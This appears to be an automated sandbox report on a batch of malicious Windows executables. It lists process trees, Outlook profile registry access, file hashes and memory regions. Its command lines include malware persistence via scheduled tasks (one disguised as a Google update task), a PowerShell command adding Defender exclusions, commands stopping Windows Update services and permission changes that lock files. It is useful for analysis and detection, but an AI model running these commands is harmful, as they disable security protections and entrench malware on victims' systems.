PID 4860 wrote to memory of 2864 N/A C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe
PID 4860 wrote to memory of 2864 N/A C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe
PID 2864 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe
PID 2864 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe
PID 2864 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3816 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe
PID 3816 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe
PID 3816 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe
PID 496 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe
PID 496 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe
PID 496 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe
PID 4696 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe
PID 4696 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe
PID 4696 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe
PID 2680 wrote to memory of 2652 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 2652 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 2652 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 3488 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 3488 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 3488 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 1564 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Windows\System32\Conhost.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe

"C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe"

C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe

"C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe"

C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe

"C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe"

C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe

"C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe"

C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe

"C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe"

C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe

"C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe"

C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe

"C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe"

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe"

C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe

"C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe"

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

"C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe"

C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe

"C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2dN8469.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2dN8469.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1088 -ip 1088

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

"C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 1648

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\Pictures\Minor Policy\pLFkWHfL7rt_NoRn4GCeHrVB.exe

"C:\Users\Admin\Pictures\Minor Policy\pLFkWHfL7rt_NoRn4GCeHrVB.exe"

C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe

"C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe"

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4008 -ip 4008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 568

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe --Task

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe --Task

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kfbfjf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2664 -ip 2664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 2380

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\1000357001\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe

"C:\Users\Admin\AppData\Local\Temp\orm6k3UPjyk7pHiE6lmOcRAp.exe"

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe --Task

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B880.bat" "

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\1000358001\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Users\Admin\AppData\Local\Temp\5D01.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D7D0.bat" "

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000fc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000b4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000c4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000b4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000100 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000110 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000108 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000dc 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000100 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000ec 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000ec 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000134 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000108 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000011c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000b4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000000c4 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 0000025c 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000298 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 00000370 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000001f8 00000084

C:\Windows\System32\smss.exe

\SystemRoot\System32\smss.exe 000001e4 00000084

Network


Files


MD5 9aaf7ff0ca90106627178fc1dd4c0f8c
SHA1 2f4ced9e628c15cf73d36ffef61fe02d3080d7e8
SHA256 d337190207ee87fc6a64d2bb46eec78c0b05df32dc755f897a3909ca5aaa3e38
SHA512 7bfa2245a1c1680f2f09a52903cc2dedc6818f27e21010c1273795853882b9beeaaed9f8140756958364b66ce12e3603d8e8e41816e016d438e818606080e288

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ACF244F1A10D4DBED0D88EBA0C43A9B5_16756CC7371BB76A269719AA1471E96C

MD5 c766d641712a061c5d17454d17595d58
SHA1 4cfefbc7797c5027ef39bf95fc7fff0e8f2085f1
SHA256 b4c954d2e45fc86dcd4efefcfefa0362a6e09be80099acba3505d9527b1e1346
SHA512 7c79ed21a39d72adf5c918f975c3f8d2f04d4dffbed29e587221d8bcffeafddde45dd71a0da27d3d87b88a22efb9e54cdd504b4b78d4294daed7bc75b494d881

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ACF244F1A10D4DBED0D88EBA0C43A9B5_16756CC7371BB76A269719AA1471E96C

MD5 2be7b09046db719d78e1f4922d29f025
SHA1 41f3344c901e61c0095f41278f876ba1147bf953
SHA256 63b8169a455355ae67a91e7214fad7cff0e73d16150398fa53ca3260797b7aaf
SHA512 fd8bcba2d225b84aa3d5309695487b911e0f4cc03e90846594c0514882ef6c929a6b010065caacbd5bc41b7ed2a6679fff331d7ba509ae6099b2932edb317720

memory/2664-604-0x0000000000400000-0x000000000062D000-memory.dmp

memory/3172-608-0x00000000071A0000-0x00000000071AA000-memory.dmp

C:\Windows\System32\GroupPolicy\GPT.INI

MD5 93b3886bce89b59632cb37c0590af8a6
SHA1 04d3201fe6f36dc29947c0ca13cd3d8d2d6f5137
SHA256 851dd2bb0f555afaef368f1f761154da17360aeea4c01b72e43bf83264762c9f
SHA512 fc7baef346b827c3a1338819baa01af63d2d4c31f3f7e17b6f6b72adab70de81872a67e8f3c1a28453abb595dbac01819a9bcff0710e9651a45deaf2f89e65fb

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/3172-623-0x0000000008250000-0x0000000008868000-memory.dmp

memory/3172-624-0x0000000007540000-0x0000000007552000-memory.dmp

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

MD5 15a8142992786ff28bb79fb2b7d47f6e
SHA1 c5fb299009599c93fef087734e13f1dc195f8ec1
SHA256 9a203a1f050818238d950b70465e679c6475cf974e7c823d188645ba6aec01ae
